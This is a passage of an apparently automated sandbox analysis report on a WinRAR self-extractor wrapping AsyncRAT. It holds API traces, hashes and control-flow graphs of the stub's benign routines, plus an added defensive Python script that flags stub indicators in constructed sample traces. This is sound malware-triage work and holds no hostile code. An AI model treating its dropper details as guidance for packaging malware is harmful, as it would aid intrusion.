                                                              • Instruction ID: 0837d853fbedae741bdb9098857ec13a266dc29f47764ac0f82345a9ecbc4401
                                                              • Opcode Fuzzy Hash: ca86e1d95daeed03c58bb98b66e307e2bfdc3229d33bca8b6397e19bd333ce40
                                                              • Instruction Fuzzy Hash: 67D151F10093C5ABDB219F50C849BDFBBE8BB85704F50491EF39996291DBB09648CB63
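The two functions above belong to the WinRAR self-extractor stub that wraps the AsyncRAT payload, not to the RAT itself. The routine at 00CB0863 resolves SetDllDirectoryW and SetDefaultDllDirectories through GetProcAddress, uses GetModuleFileNameW, CompareStringW and GetFileAttributesW to look for DXGIDebug.dll, dwmapi.dll and uxtheme.dll beside the executable, and if it finds one writes "Please remove %s from %s folder. It is unsecure to run %s until it is done." to a console and calls ExitProcess (WinRAR's guard against DLL preloading from the extraction folder). The routine at 00CBB7E5 creates the winrarsfxmappingfile.tmp file mapping, reads the command line, launches a child with ShellExecuteExW and waits on it with WaitForInputIdle. When many such reports have to be triaged, pulling these indicators out of the API trace mechanically is faster than reading the dumps. The following Python is an added example written for this page; it is not part of the Joe Sandbox report or its IDA plugin. It assumes trace lines are rendered exactly as on this page ("• API.MODULE(args), ref: ADDR", subcalls prefixed with "Part of subcall function ..."), and the embedded sample is a constructed subset of the lines shown above.

```python
import re
from collections import Counter

# Constructed sample input: a subset of the API trace lines for functions
# 00CB0863 and 00CBB7E5 as rendered in this report. Offline, no sandbox needed.
SAMPLE_TRACE = """\
• GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CD3C7C,?,00000000,?,00000800), ref: 00CB0C72
  • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CBBBD0
• GetCommandLineW.KERNEL32 ref: 00CBBBEA
• ShellExecuteExW.SHELL32(0000003C), ref: 00CBBC6F
• WaitForInputIdle.USER32(?,00002710), ref: 00CBBCA5
"""

# One trace line: optional "Part of subcall function XXXX:" prefix, then
# API.MODULE, optional (args), optional comma, "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The plugin prints numeric arguments as 8-digit hex and unresolved ones as '?'.
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Hardening/indicator names this example looks for (assumed from this page).
DLL_DIR_APIS = {"SetDllDirectoryW", "SetDefaultDllDirectories"}
SFX_MAPPING_NAME = "winrarsfxmappingfile.tmp"


def parse_trace(text):
    """Parse trace lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,
        })
    return calls


def literal_args(call):
    """Return only the arguments the plugin resolved to strings (not hex, not '?')."""
    return [a for a in call["args"] if a and a != "?" and not HEX_RE.match(a)]


def triage(text):
    """Summarise a function's trace: API histogram plus WinRAR-SFX indicators."""
    calls = parse_trace(text)
    literals = []
    resolved = set()          # names passed to GetProcAddress
    for c in calls:
        lits = literal_args(c)
        literals.extend(lits)
        if c["api"] == "GetProcAddress":
            resolved.update(lits)
    direct = [c for c in calls if not c["subcall"]]
    apis = [c["api"] for c in direct]
    # File mapping created before the child launch, as in the SFX stub.
    mapping_then_launch = (
        "CreateFileMappingW" in apis and "ShellExecuteExW" in apis
        and apis.index("CreateFileMappingW") < apis.index("ShellExecuteExW")
    )
    return {
        "calls": len(calls),
        "api_counts": Counter(apis),
        "winrar_sfx_mapping": SFX_MAPPING_NAME in literals,
        "dll_dir_hardening": sorted(resolved & DLL_DIR_APIS),
        "preload_check_dlls": sorted(a for a in literals if a.lower().endswith(".dll")),
        "mapping_then_launch": mapping_then_launch,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```

A positive winrar_sfx_mapping together with the SetDefaultDllDirectories resolution is a good first-pass signal that the trace is the stock SFX stub rather than the payload, so analyst time is better spent on the dropped files and the child process than on these routines.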

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 346 cbc73f-cbc757 call cbeb78 call cbec50 351 cbd40d-cbd418 346->351 352 cbc75d-cbc787 call cbb314 346->352 352->351 355 cbc78d-cbc792 352->355 356 cbc793-cbc7a1 355->356 357 cbc7a2-cbc7b7 call cbaf98 356->357 360 cbc7b9 357->360 361 cbc7bb-cbc7d0 call cb1fbb 360->361 364 cbc7dd-cbc7e0 361->364 365 cbc7d2-cbc7d6 361->365 367 cbd3d9-cbd404 call cbb314 364->367 368 cbc7e6 364->368 365->361 366 cbc7d8 365->366 366->367 367->356 379 cbd40a-cbd40c 367->379 369 cbca5f-cbca61 368->369 370 cbc9be-cbc9c0 368->370 371 cbc7ed-cbc7f0 368->371 372 cbca7c-cbca7e 368->372 369->367 374 cbca67-cbca77 SetWindowTextW 369->374 370->367 376 cbc9c6-cbc9d2 370->376 371->367 377 cbc7f6-cbc850 call cba64d call cabdf3 call caa544 call caa67e call ca6edb 371->377 372->367 375 cbca84-cbca8b 372->375 374->367 375->367 380 cbca91-cbcaaa 375->380 381 cbc9e6-cbc9eb 376->381 382 cbc9d4-cbc9e5 call cc7686 376->382 432 cbc98f-cbc9a4 call caa5d1 377->432 379->351 384 cbcaac 380->384 385 cbcab2-cbcac0 call cc3e13 380->385 388 cbc9ed-cbc9f3 381->388 389 cbc9f5-cbca00 call cbb48e 381->389 382->381 384->385 385->367 401 cbcac6-cbcacf 385->401 393 cbca05-cbca07 388->393 389->393 398 cbca09-cbca10 call cc3e13 393->398 399 cbca12-cbca32 call cc3e13 call cc3e3e 393->399 420 cbca4b-cbca4d 399->420 421 cbca34-cbca3b 399->421 406 cbcaf8-cbcafb 401->406 407 cbcad1-cbcad5 401->407 410 cbcb01-cbcb04 406->410 413 cbcbe0-cbcbee call cb0602 406->413 407->410 411 cbcad7-cbcadf 407->411 414 cbcb11-cbcb2c 410->414 415 cbcb06-cbcb0b 410->415 411->367 418 cbcae5-cbcaf3 call cb0602 411->418 430 cbcbf0-cbcc04 call cc279b 413->430 433 cbcb2e-cbcb68 414->433 434 cbcb76-cbcb7d 414->434 415->413 415->414 418->430 420->367 429 cbca53-cbca5a call cc3e2e 420->429 427 cbca3d-cbca3f 421->427 428 cbca42-cbca4a call cc7686 421->428 427->428 428->420 429->367 448 cbcc11-cbcc62 call cb0602 call cbb1be GetDlgItem SetWindowTextW SendMessageW call cc3e49 430->448 449 cbcc06-cbcc0a 430->449 450 cbc9aa-cbc9b9 call caa55a 432->450 451 cbc855-cbc869 SetFileAttributesW 432->451 469 cbcb6a 433->469 470 cbcb6c-cbcb6e 433->470 439 cbcbab-cbcbce call cc3e13 * 2 434->439 440 cbcb7f-cbcb97 call cc3e13 434->440 439->430 474 cbcbd0-cbcbde call cb05da 439->474 440->439 462 cbcb99-cbcba6 call cb05da 440->462 480 cbcc67-cbcc6b 448->480 449->448 452 cbcc0c-cbcc0e 449->452 450->367 457 cbc90f-cbc91f GetFileAttributesW 451->457 458 cbc86f-cbc8a2 call cab991 call cab690 call cc3e13 451->458 452->448 457->432 467 cbc921-cbc930 DeleteFileW 457->467 489 cbc8b5-cbc8c3 call cabdb4 458->489 490 cbc8a4-cbc8b3 call cc3e13 458->490 462->439 467->432 473 cbc932-cbc935 467->473 469->470 470->434 477 cbc939-cbc965 call ca4092 GetFileAttributesW 473->477 474->430 487 cbc937-cbc938 477->487 488 cbc967-cbc97d MoveFileW 477->488 480->367 484 cbcc71-cbcc85 SendMessageW 480->484 484->367 487->477 488->432 491 cbc97f-cbc989 MoveFileExW 488->491 489->450 496 cbc8c9-cbc909 call cc3e13 call cbfff0 SHFileOperationW 489->496 490->489 490->496 491->432 496->457
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CBC744
                                                                • Part of subcall function 00CBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CBB3FB
                                                              • _wcslen.LIBCMT ref: 00CBCA0A
                                                              • _wcslen.LIBCMT ref: 00CBCA13
                                                              • SetWindowTextW.USER32(?,?), ref: 00CBCA71
                                                              • _wcslen.LIBCMT ref: 00CBCAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CBCBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBCC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CBCC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,00CEA472), ref: 00CBCC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CBCC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 2804936435-312220925
                                                              • Opcode ID: eb83b4ffa16be7f84318d728fdd88977d604f3f67f54e04e68e255ab73a86820
                                                              • Instruction ID: 99991f081c396ea5f5c39c5bf91783011645443057f5cbca505dfc2e25d467af
                                                              • Opcode Fuzzy Hash: eb83b4ffa16be7f84318d728fdd88977d604f3f67f54e04e68e255ab73a86820
                                                              • Instruction Fuzzy Hash: 7EE163B2900259AADF24DBA0DC85EEE73BCAB04350F4040AAF619E7151EF749F44DF61
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CADA70
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CADAAC
                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046A), ref: 00CB1BA0
                                                              • _wcslen.LIBCMT ref: 00CADDE9
                                                              • __fprintf_l.LIBCMT ref: 00CADF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                              • API String ID: 566448164-801612888
                                                              • Opcode ID: d835d144b64078ce8faf850e88248a4f94c4340b87f306fa0ea715fa92083267
                                                              • Instruction ID: 6d56771bd560053d599df51ece3dc9d08da540f73b5aaeae0e59d90d1d6c32d3
                                                              • Opcode Fuzzy Hash: d835d144b64078ce8faf850e88248a4f94c4340b87f306fa0ea715fa92083267
                                                              • Instruction Fuzzy Hash: AA32047190021A9BCF24EF68CC41BEE77A4FF06708F40456AFA1697291E7B1DE85DB90

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              • GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                              • Instruction ID: c39e62f4638d847c33ca38c41e0333dbb4e60431581dc3b1e2302ce7c6d92fc2
                                                              • Opcode Fuzzy Hash: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                              • Instruction Fuzzy Hash: E431CF71146346AFE311DF21AC4AFAB7FACEB86704F000518F655D62E0EB748A0887B6

                                                              Control-flow Graph
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CBD7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 00CBD8DE
                                                              • IsWindowVisible.USER32(?), ref: 00CBD911
                                                              • ShowWindow.USER32(?,00000000), ref: 00CBD91D
                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00CBD92E
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00CBD959
                                                              • CloseHandle.KERNEL32(?), ref: 00CBD97F
                                                              • ShowWindow.USER32(?,00000001), ref: 00CBD9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                              • String ID: .exe$.inf
                                                              • API String ID: 3646668279-3750412487
                                                              • Opcode ID: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                              • Instruction ID: de231151d2098269ee19c3552789dd4b7849f569190ee5e6e3fe0afeb951738c
                                                              • Opcode Fuzzy Hash: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                              • Instruction Fuzzy Hash: 9B51E5708043809ADB309F64A844BFB7BE4AF46744F04041EF5D6972A1FB728F85DB52

                                                              Control-flow Graph
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC57FB,00CC57FB,?,?,?,00CCABAC,00000001,00000001,2DE85006), ref: 00CCA9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CCAA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CCAB35
                                                              • __freea.LIBCMT ref: 00CCAB42
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              • __freea.LIBCMT ref: 00CCAB4B
                                                              • __freea.LIBCMT ref: 00CCAB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 245ba948d1e13530cf56635c5418c7793051f5f33c4d56fbbbae85e789af1e79
                                                              • Instruction ID: 09d8fee3208e3345e85151fd557d9c8c17fb98e3b4330ff46c023a6a1ed9bd4e
                                                              • Opcode Fuzzy Hash: 245ba948d1e13530cf56635c5418c7793051f5f33c4d56fbbbae85e789af1e79
                                                              • Instruction Fuzzy Hash: DB51F272A0021AAFDB258F64CC59FBFB7AAEB40718F15462DFC14D6140EB30DD40E692

                                                              Control-flow Graph
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBDC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBDC72
                                                              • TranslateMessage.USER32(?), ref: 00CBDC7C
                                                              • DispatchMessageW.USER32(?), ref: 00CBDC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: 429d20a1f09219ab811ac04a18f5b1632411be6f957f44b6feff585238e7a34e
                                                              • Instruction ID: 242c7749d7a0ce8705a077b684fd15e47fbb43a09290e7fb815f35b02531c273
                                                              • Opcode Fuzzy Hash: 429d20a1f09219ab811ac04a18f5b1632411be6f957f44b6feff585238e7a34e
                                                              • Instruction Fuzzy Hash: E2F03C72A02219BBCB206BA5DC4CEDF7F6DEF41791F004011B51AE2151E675D646C7B1

                                                              Control-flow Graph
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00CBCE9D
                                                                • Part of subcall function 00CAB690: _wcslen.LIBCMT ref: 00CAB696
                                                              • _swprintf.LIBCMT ref: 00CBCED1
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • SetDlgItemTextW.USER32(?,00000066,00CE946A), ref: 00CBCEF1
                                                              • EndDialog.USER32(?,00000001), ref: 00CBCFFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 110358324-1360425832
                                                              • Opcode ID: 40230a842c38bc80bfc3b0c5638fab6f48e87a342cff1d66b65f6a2e90f7251d
                                                              • Instruction ID: 4a25c9531e98adeed804987f3c157732df656213262a79b87ae721443baf1dbc
                                                              • Opcode Fuzzy Hash: 40230a842c38bc80bfc3b0c5638fab6f48e87a342cff1d66b65f6a2e90f7251d
                                                              • Instruction Fuzzy Hash: 45415FB1900259AADF259FA0DC85FEE77FCEB05340F4080A6F90AE7191EE709A44DF61

                                                              Control-flow Graph
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00CC3C35,00000000,00000FA0,00D02088,00000000,?,00CC3D60,00000004,InitializeCriticalSectionEx,00CD6394,InitializeCriticalSectionEx,00000000), ref: 00CC3C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: db882b74eac273bd3bab8faafdcfcc63ced40b7668a02056780d26989eaa4726
                                                              • Instruction ID: 52baca03c0c62913af53c952ce1905f0eb71615f8be309e607c3a8d44b487bde
                                                              • Opcode Fuzzy Hash: db882b74eac273bd3bab8faafdcfcc63ced40b7668a02056780d26989eaa4726
                                                              • Instruction Fuzzy Hash: 38110635A052A1ABCB228B6CEC55F5D37649F05770F214225F925FB2D0E770EF008AD1

                                                              Control-flow Graph
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00CBABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CBABF9
                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CBABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: f64096bb7f54f2186942f590f6e4131be7b6a620a08f184bb280eebbdd98da5f
                                                              • Instruction ID: 749da8f7f7489ddb49b1f9b98851cc2afdd61a7db8fe279d8d709b6a4fec9943
                                                              • Opcode Fuzzy Hash: f64096bb7f54f2186942f590f6e4131be7b6a620a08f184bb280eebbdd98da5f
                                                              • Instruction Fuzzy Hash: 44F0823260132877DB205A649C09FDB766C9B46B40F494016BA59E2280D761DB45C6B6

                                                              Control-flow Graph

